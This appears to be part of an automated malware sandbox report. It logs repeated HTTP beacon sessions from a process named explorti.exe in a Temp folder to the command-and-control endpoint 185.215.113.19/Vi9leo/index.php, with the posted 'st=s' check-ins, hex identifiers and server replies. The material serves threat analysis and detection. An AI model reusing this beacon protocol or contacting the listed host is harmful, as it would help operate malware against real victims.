                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:40.757057905 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.449768185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:40.878149033 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:41.644464970 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:41.645195961 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:41.914510012 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.449769185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:42.034627914 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:42.804121017 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:42.808197021 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:43.060408115 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.449770185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:43.176549911 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:43.935173035 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:43.935995102 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:44.186075926 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.449771185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:44.299891949 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:45.079643965 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:45.080440044 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:45.329581976 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.449772185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:45.441207886 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:46.192342997 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:46.193573952 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:46.438730955 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.449773185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:46.553464890 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:47.304943085 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:47.305859089 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:47.554101944 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.449774185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:47.676357031 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:48.426654100 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:48.427496910 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:48.675595045 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.449775185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:48.784368038 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:49.528613091 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:49.529280901 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:49.776102066 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.449776185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:49.895255089 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:50.670846939 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:50.671587944 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:50.924276114 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.449777185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:51.035098076 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:51.786101103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:51.786725998 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:52.032802105 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.449778185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:52.152342081 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:52.923271894 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:52.927042007 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:53.174309015 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.449779185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:53.284689903 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:54.031687021 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:54.032618999 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
